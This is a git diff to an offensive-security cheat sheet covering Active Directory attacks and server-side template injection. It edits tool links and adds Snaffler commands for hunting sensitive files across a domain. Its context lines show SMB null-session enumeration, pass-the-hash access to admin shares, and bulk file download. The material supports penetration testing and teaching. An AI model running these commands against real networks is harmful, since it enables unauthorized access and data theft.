diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0878006..db4c84f 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -848,7 +848,7 @@ Automated exploitation: > Some shares can be accessible without authentication, explore them to find some juicy files -* [smbmap](https://github.com/ShawnDEvans/smbmap) +* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap) ```powershell smbmap -H 10.10.10.10 # null session smbmap -H 10.10.10.10 -R # recursive listing @@ -856,7 +856,7 @@ Automated exploitation: smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" ``` -* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) +* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) ```powershell pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ @@ -866,7 +866,7 @@ Automated exploitation: put # replace a file ``` -* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) +* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) ```powershell smbclient -I 10.10.10.100 -L ACTIVE -N -U "" Sharename Type Comment @@ -896,6 +896,22 @@ Automated exploitation: smb: \> mget * ``` + +* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler) + ```ps1 + snaffler.exe -s - snaffler.log + + # Snaffle all the computers in the domain + ./Snaffler.exe -d domain.local -c -s + + # Snaffle specific computers + ./Snaffler.exe -n computer1,computer2 -s + ​ + # Snaffle a specific directory + ./Snaffler.exe -i C:\ -s + ``` + + ### SCF and URL file attack against writeable share Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) @@ -4032,3 +4048,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) * [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) * [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) +* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d34acdd..12e1575 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -1085,7 +1085,6 @@ layout template: ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) -* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)